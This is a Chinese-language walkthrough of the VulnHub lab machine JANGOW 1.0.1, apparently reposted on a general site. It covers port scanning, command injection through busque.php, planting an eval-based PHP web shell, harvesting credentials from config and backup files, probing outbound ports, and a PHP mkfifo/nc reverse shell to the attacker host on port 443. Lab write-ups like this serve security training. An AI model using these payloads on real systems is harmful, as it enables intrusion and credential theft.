vulnhub靶场之JANGOW: 1.0.1 _生活百科

准备：
攻击机：虚拟机kali、本机win10 。
靶机：JANGOW: 1.0.1 ，地址我这里设置的桥接，，下载地址：https://download.vulnhub.com/jangow/jangow-01-1.0.1.ova.torrent，下载后直接VirtualBox打开，测试时发现vm打开之后靶机获取ip会出问题（设置的桥接，在网上看了vm修改ip的问题比较麻烦，所以就直接用的VirtualBox）。

文章插图
信息收集：
扫描下靶机开放的端口和服务：nmap -T4 -sV -p- -A 172.20.10.2 ，显示开放了21、80端口，对应的服务是ftp服务和apache服务。

文章插图
访问下ftp服务和tomcat服务，但是ftp服务缺少账号和密码无法登录，tomcat服务返回了一个界面

文章插图

文章插图
期间也对：http://172.20.10.2/和http://172.20.10.2/site/进行了目录扫描，但是并没有什么发现

文章插图

文章插图
然后就在主页面寻找功能点，右键查看源代码信息，在代码中发现busque.php文件和传递的参数buscar，猜测这里是命令执行漏洞或代码执行漏洞并进行测试，url：http://172.20.10.2/site/busque.php?buscar=id，可以查看pwd、ls等信息，确认这里存在命令执行漏洞。

文章插图

文章插图
web渗透：
通过命令执行写入一句话后门，url：http://172.20.10.2/site/busque.php?buscar=echo '<?php eval($_POST['upfine']);?>' > upfine.php，然后通过蚁剑进行连接。

文章插图
在wordpress下发现config.php文件、html下发现.backup文件，/home/jangow01/下发现user.txt文件，root文件夹无权限查看（后面肯定要进行提权，那我们就得先获得shell权限），下载下来进行查看，发现两个账户名和密码，其中jangw01/abygurl69可以用于ftp登录。

文章插图

文章插图
接下来进行反弹shell，但是发现nc参数不全，无法使用。

文章插图
经过多种shell反弹测试，但是均未反弹成功，最后发现对端口进行了限制，经过测试发现443端口可以使用，端口测试过程如下：
在攻击机中安装iptables和libcbor0 ，在kali（攻击机）中使用iptables进行端口绑定，这里就限制了400：500的端口，语句：sudo iptables -A PREROUTING -t nat -p tcp --dport 400:500 -j REDIRECT --to-port 6688 。

文章插图
然后开启对6688端口的监听：nc -lvvp 6688，在然后在靶机中上传一个简单的探测脚本，脚本信息：

for i in {400..450};dotimeout 1 nc -vz 172.20.10.5 $i && echo "$i open" >> result.txt || echo "$i closed" >> result.txt;done

然后在蚁剑的命令窗口中执行脚本：bash test.sh，获得可以使用的端口信息。

文章插图
然后就可以通过443端口来获取shell，设置的策略默认重启失效，还以为要自己删除，折腾了半天也没效果，最后才发现重启之后就会失效。
通过蚁剑编写反弹shell，语句：<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 172.20.10.5 443 >/tmp/f');?>，kali端开启端口监听：nc -lvvp 443，然后访问shell.php文件（http://172.20.10.2/site/shell.php）获得shell权限。